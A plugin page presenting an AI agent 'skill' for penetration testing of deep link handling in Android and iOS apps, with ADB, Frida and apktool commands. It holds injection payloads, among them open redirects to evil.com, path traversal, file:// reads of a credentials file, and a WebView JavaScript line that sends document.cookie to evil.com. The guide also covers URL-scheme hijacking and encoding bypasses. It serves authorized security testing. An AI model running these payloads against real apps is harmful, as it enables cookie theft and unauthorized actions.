Skill

exploiting-deeplink-vulnerabilities

Tests deep link vulnerabilities in Android/iOS apps via ADB, apktool, and plist analysis to detect injection, intent hijacking, unauthorized access, and redirects.

Android

iOS

Bash

security

mobile

npx claudepluginhub mukul975/anthropic-cybersecurity-skills --plugin cybersecurity-skills

Tool Access

This skill uses the workspace's default tool permissions.

Preview

Use this skill when:

Supporting Assets

LICENSEassets/template.mdreferences/api-reference.mdreferences/standards.mdreferences/workflows.mdscripts/agent.pyscripts/process.py

SKILL.md

Similar Skills

applying-brand-guidelines

41.6k

Applies Acme Corporation brand guidelines including colors, fonts, layouts, and messaging to generated PowerPoint, Excel, and PDF documents.

3 files

anthropics-claude-cookbooks

creating-financial-models

41.6k

Builds DCF models with sensitivity analysis, Monte Carlo simulations, and scenario planning for investment valuation and risk assessment.

2 files

anthropics-claude-cookbooks

analyzing-financial-statements

41.6k

Calculates profitability (ROE, margins), liquidity (current ratio), leverage, efficiency, and valuation (P/E, EV/EBITDA) ratios from financial statements in CSV, JSON, text, or Excel for investment analysis.

2 files

anthropics-claude-cookbooks

Stats

Stars5748

Forks783

Last CommitApr 6, 2026

Actions

View Source View Plugin View on GitHub View README

Exploiting Deep Link Vulnerabilities

When to Use

Use this skill when:

Assessing mobile app deep link handling for injection and redirect vulnerabilities
Testing Android intent filters and iOS URL scheme handlers for unauthorized access
Evaluating App Links (Android) and Universal Links (iOS) verification
Testing for link hijacking via competing app registrations

Do not use without authorization -- deep link exploitation can trigger unintended actions in target applications.

Prerequisites

Android device with ADB or iOS device with Objection/Frida
APK decompiled with apktool or JADX for AndroidManifest.xml analysis
Knowledge of target app's registered URL schemes and intent filters
Drozer for Android intent testing
Burp Suite for intercepting deep link-triggered API calls

Workflow

Step 1: Enumerate Deep Link Entry Points

Android - Extract from AndroidManifest.xml:

# Decompile APK
apktool d target.apk -o decompiled/

# Search for intent filters with deep link schemes
grep -A 10 "android.intent.action.VIEW" decompiled/AndroidManifest.xml

# Look for:
# <data android:scheme="myapp" android:host="action" />
# <data android:scheme="https" android:host="target.com" />

iOS - Extract from Info.plist:

# Extract URL schemes
plutil -p Payload/TargetApp.app/Info.plist | grep -A 5 "CFBundleURLSchemes"

# Extract Universal Links (Associated Domains)
plutil -p Payload/TargetApp.app/Info.plist | grep -A 5 "com.apple.developer.associated-domains"
# Check: applinks:target.com

# Verify apple-app-site-association file
curl https://target.com/.well-known/apple-app-site-association

Step 2: Test Deep Link Injection

Android via ADB:

# Basic deep link invocation
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://dashboard?user_id=1337" com.target.app

# Test with injection payloads
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://profile?redirect=https://evil.com" com.target.app

# Test path traversal
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://navigate?path=../../../admin" com.target.app

# Test JavaScript injection (if loaded in WebView)
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://webview?url=javascript:alert(document.cookie)" com.target.app

# Test with extra intent parameters
adb shell am start -a android.intent.action.VIEW \
  -d "myapp://transfer?amount=1000&to=attacker" \
  --es extra_param "injected_value" com.target.app

iOS via Safari or command line:

# Trigger URL scheme from Safari
# Navigate to: myapp://dashboard?user_id=1337

# Using Frida to invoke
frida -U -n TargetApp -e '
ObjC.classes.UIApplication.sharedApplication()
  .openURL_(ObjC.classes.NSURL.URLWithString_("myapp://profile?redirect=https://evil.com"));
'

Step 3: Test Link Hijacking

Android:

# Create a malicious app that registers the same URL scheme
# AndroidManifest.xml of attacker app:
# <intent-filter>
#   <action android:name="android.intent.action.VIEW" />
#   <category android:name="android.intent.category.DEFAULT" />
#   <category android:name="android.intent.category.BROWSABLE" />
#   <data android:scheme="myapp" />
# </intent-filter>

# When both apps are installed, Android shows a chooser dialog
# On older Android versions, the first-installed app may handle the link

# Check App Links verification (prevents hijacking)
adb shell pm get-app-links com.target.app
# Status: verified = secure
# Status: undefined = vulnerable to hijacking

Step 4: Test WebView Deep Link Loading

# If deep links load URLs in WebView, test for:
# 1. Open redirect
adb shell am start -d "myapp://open?url=https://evil.com" com.target.app

# 2. File access
adb shell am start -d "myapp://open?url=file:///data/data/com.target.app/shared_prefs/creds.xml"

# 3. JavaScript execution in WebView
adb shell am start -d "myapp://open?url=javascript:fetch('https://evil.com/steal?cookie='+document.cookie)"

Step 5: Assess Parameter Validation

Test each deep link parameter for:

SQL injection in parameters that query local databases
Path traversal in file path parameters
SSRF in URL parameters that trigger server requests
Authentication bypass via user_id or session parameters

Key Concepts

Term	Definition
Custom URL Scheme	App-registered protocol (myapp://) that routes to specific app handlers when invoked
App Links (Android)	Verified HTTPS deep links that bypass the chooser dialog and open directly in the verified app
Universal Links (iOS)	Apple's verified deep linking using apple-app-site-association JSON file on the web domain
Intent Hijacking	Malicious app intercepting deep links by registering the same URL scheme or intent filter
WebView Bridge	JavaScript interface exposed to WebView content, potentially accessible via deep link-loaded URLs

Tools & Systems

ADB: Android command-line tool for invoking deep links via am start
Drozer: Android security framework for testing intent-based attack surface
apktool: APK decompiler for extracting AndroidManifest.xml and intent filter definitions
Frida: Dynamic instrumentation for hooking URL scheme handlers at runtime
Burp Suite: Proxy for intercepting API calls triggered by deep link navigation

Common Pitfalls

App Links verification: Android App Links with verified domain associations are resistant to hijacking. Check assetlinks.json at https://domain/.well-known/assetlinks.json.
Fragment handling: Some apps process URL fragments (#) differently than query parameters (?). Test both.
Encoding bypass: URL-encode payloads to bypass client-side input filtering in deep link handlers.
Multi-step deep links: Some deep links require authentication state. Test after login and before login to assess authorization enforcement.